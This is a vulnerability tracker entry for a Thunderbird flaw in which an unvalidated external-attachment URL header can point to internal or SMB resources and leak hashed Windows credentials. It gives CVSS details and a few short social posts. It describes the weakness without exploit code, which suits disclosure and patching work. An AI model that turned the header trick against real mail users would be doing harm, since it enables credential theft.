- Description
- Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle attachments which can be hosted externally. When an email is opened, Thunderbird accesses the specified URL to determine file size, and navigates to it when the user clicks the attachment. Because the URL is not validated or sanitized, it can reference internal resources like chrome:// or SMB share file:// links, potentially leading to hashed Windows credential leakage and opening the door to more serious security issues. This vulnerability affects Thunderbird < 137.0.2 and Thunderbird < 128.9.2.
- Source
- security@mozilla.org
- NVD status
- Awaiting Analysis
CVSS 3.1
- Type
- Secondary
- Base score
- 6.3
- Impact score
- 3.4
- Exploitability score
- 2.8
- Vector string
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
- Severity
- MEDIUM
- 134c704f-9b21-4f2e-91b3-4a467353bcc0
- CWE-601
- Hype score
- Not currently trending
🛡️ Firefox 137.0.2 & Thunderbird updates fix high-severity bugs: - CVE-2025-3608: memory corruption via race condition - CVE-2025-3522 & 2830: info exposure via malformed URLs/files Update now to stay protected! https://t.co/YJZSx39lZI #infosec #firefox https://t.co/
@dCypherIO
16 Apr 2025
26 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
⚠️ Critical Thunderbird flaws (CVE-2025-3522 & CVE-2025-3523) let attackers exploit external attachment URLs to steal credentials or mislead users. Update ASAP. Details 👇 #CyberSecurity #InfoSec #Mozilla #CVEs https://t.co/LzC9OoX4Q6
@threatsbank
16 Apr 2025
7 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
CVE-2025-3522 Thunderbird processes the X-Mozilla-External-Attachment-URL header to handle attachments which can be hosted externally. When an email is opened, Thunderbird accesses t… https://t.co/JQnmoVGWPN
@CVEnew
15 Apr 2025
257 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes